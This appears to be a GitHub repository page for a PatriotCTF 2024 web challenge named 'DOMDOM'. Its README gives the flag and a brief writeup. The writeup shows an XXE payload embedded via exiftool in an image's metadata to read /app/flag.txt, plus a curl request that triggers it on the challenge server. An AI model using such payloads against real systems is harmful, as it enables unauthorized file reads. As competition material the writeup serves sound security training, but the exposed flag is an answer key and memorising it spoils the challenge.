PatriotCTF2024/web/dom at main · MasonCompetitiveCyber/PatriotCTF2024 · GitHub

Name		Name	Last commit message	Last commit date
parent directory ..
challenge		challenge
config		config
dist		dist
Dockerfile		Dockerfile
README.md		README.md
build-docker.sh		build-docker.sh
clear_uploads.sh		clear_uploads.sh
dist.tar		dist.tar
flag.txt		flag.txt
note.txt		note.txt
orchestrate.json		orchestrate.json
test.png		test.png
test.png_original		test.png_original

README.md

DOMDOM

I love face-book and I love to share my photos with my friends.

Description

Difficulty

6./10

Flag

PCTF{Y0u_D00m3D_U5_Man_So_SAD}

Hints

Author

Kiran Ghimire (sau)

Tester

Writeup

exiftool -Comment="<?xml version='1.0'?><\!DOCTYPE root [<\!ENTITY test SYSTEM 'file:///app/flag.txt'>]><root>&test;</root>" test.png
Upload the image file
curl 'http://172.17.0.2:9090/check' -X POST -d 'url=http://172.17.0.2:9090/meta?image=imagename.png<random_num>'